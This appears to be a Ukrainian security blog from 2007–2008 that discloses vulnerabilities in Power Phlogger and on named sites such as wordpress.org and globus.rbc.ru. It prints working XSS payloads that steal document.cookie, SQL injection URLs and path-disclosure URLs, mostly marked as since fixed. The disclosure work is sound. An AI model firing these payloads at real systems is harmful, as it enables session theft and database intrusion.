Websecurity - Веб безпека

Раніше я вже писав про уразливості в Power Phlogger. Зараз повідомлю про нові уразливості в даній системі для ведення статистики відвідувань. В лютому, 16.02.2008, я виявив Cross-Site Scripting та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

XSS (Persistent):

POST запит на сторінці http://site/edUserprofile.php (можливі як GET, так і POST запити):

</textarea><script>alert(document.cookie)</script>В параметрі: N_your_url.

"><script>alert(document.cookie)</script>В параметрі: N_email.

"><script src=http://site.comВ параметрах: N_fg_c, N_bg_c (обмеження в 30 символів).

XSS:

http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit

Full path disclosure:

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це третя частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

06.08.2007

Вчора, 05.08.2007, я знайшов Cross-Site Scripting уразливості на wordpress.org - сайті розробників WordPress. Про що найближчим часом сповіщу адміністрацію сайта.

Дані XSS дірки я знайшов, як раз коли зайшов на сайт почитати новину про вихід нових версій WP (про що я писав перед цим).

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.05.2008

XSS:

POST запит на сторінці http://wordpress.org/report-bugs/:

"><script>alert(document.cookie)</script>В полях: Your Email, URL of Problem.

</textarea><script>alert(document.cookie)</script>В полі: Describe in detail.

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• YA Book Persistent XSS Bug (деталі)
• Post Revolution Remote File Inclusion (деталі)
• phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit (деталі)
• DmCMS Shell Uploading (деталі)
• acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerablitiy (деталі)
• TJSChat Version 0.95 Cross Site Scripting (деталі)
• Big Blue Guestbook HTML Injection Vulnerabilities (деталі)
• bibtex mase Remote File Inclusion (деталі)
• Remote file inclusion in Joomla 1.5.0 Beta (деталі)
• Cross-site scripting (XSS) vulnerability in DevTrack 6.x (деталі)

У червні, 20.06.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.itmg.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Дана компанія займається ІТ виставками і семенарами. І вона провела в Києві такі семенари як CEE Outsourcing Summit 2007 та TMT.Ventures’08 Kyiv. Я неодноразово писав про уразливості на сайтах виставок (в тому числі й виставок на тему безпеки) і сайт даної компанії в плані безпеки також нічим не краще за інших. Останнього разу стосовно сайтів виставок я писав про уразливості на imu.org.ua.

XSS:

POST запит на сторінці http://www.itmg.com.ua/search/ (а також на всіх сторінках сайта в пошуковій формі):

"><script>alert(document.cookie)</script>В полі пошуку.

XSS через GET:

• alert(document.cookie)
• цікавий

24.01.2008

У червні, 25.06.2007, я знайшов Cross-Site Scripting уразливість на проекті http://poisk.dn.ua (пошукова система та каталог). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

14.05.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• Uebimiau Webmail Multiple Vulnerabilities (деталі)
• DGNews version 2.1 Path Disclosure Vulnerability (деталі)
• DGNews version 2.1 SQL Injection Vulnerability (деталі)
• myEvent version 1.6 Multiple Path Disclosure Vulnerabilities (деталі)
• DGNews version 2.1 XSS Attack Vulnerability (деталі)
• Practicle Gallery 1.0.1 XSS (деталі)
• Full Path Disclosure in Almnzm (деталі)
• cpcommerce < v1.1.0 [sql injection] (деталі)
• SalesCart Shopping Cart SQL Injection Vulnerability (деталі)
• Міжсайтовий скриптінг в PostNuke (деталі)

20.01.2008

У червні, 19.06.2007, як раз під час проведення проекту MOSEB, я знайшов Cross-Site Scripting уразливість на пошуковій системі http://globalspec.com (The Engineering Search Engine). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.05.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• Remedy for: Remote File Include In phpexplorator_2_0 (деталі)
• Jetbox CMS version 2.1 Multiple SQL Injection Vulnerabilities (деталі)
• Simple Accessible XHTML Online News v4.6 Remote File Include Exploit (деталі)
• SimpGB v1.46.0 Remote File Include Exploit (деталі)
• phpPgAdmin Multiple XSS Vulnerabilities (деталі)
• RMForum Database Disclosure Vulnerabilitiy (деталі)
• Zindizayn Okul Web Sistemi v1.0 Sql VulnZ. (деталі)
• eggblog - Session fixation Issue (деталі)
• Re: DGNews version 2.1 SQL Injection Vulnerability (деталі)
• Розкриття паролів в Random PHP Quote (деталі)

19.01.2008

У червні, 19.06.2007, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на http://globus.rbc.ru (Global Base of Universal Statistics) - проекті компанії РБК. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на сайтах РБК.

Детальна інформація про уразливості з’явиться пізніше.

09.05.2008

XSS:

• alert(document.cookie)

SQL DB Structure Extraction:

http://globus.rbc.ru/rbc/quote_search.html?query=’

SQL Injection:

http://globus.rbc.ru/rbc/quote_search.html?query=1′/**/or/**/1=1)/*

Дані уразливості вже виправлені. Варто лише не забувати дякувати людям, що піклуються про вашу безпеку, як це звичайно трапляється у РБК.

В даній добірці уразливості в веб додатках:

• ClientExec XSS vuln. (деталі)
• Parodia XSS vuln (деталі)
• CandyPress Store XSS vuln. (деталі)
• Jetbox CMS version 2.1 Multiple SQL Injection Vulnerabilities (деталі)
• Jetbox CMS version 2.1 Multiple Path Disclosure Vulnerabilities (деталі)
• SQL-Injection in IP-TRACKING Mod for phpBB2.0.x (деталі)
• HLstats v1.35 Cross-Site Scripting Vulnerability #2 (деталі)
• HLstats v1.35 Cross-Site Scripting Vulnerability (деталі)
• Gnats XSS vuln (деталі)
• Міжсайтовий скриптінг і SQL-ін’єкція в Enthusiast (деталі)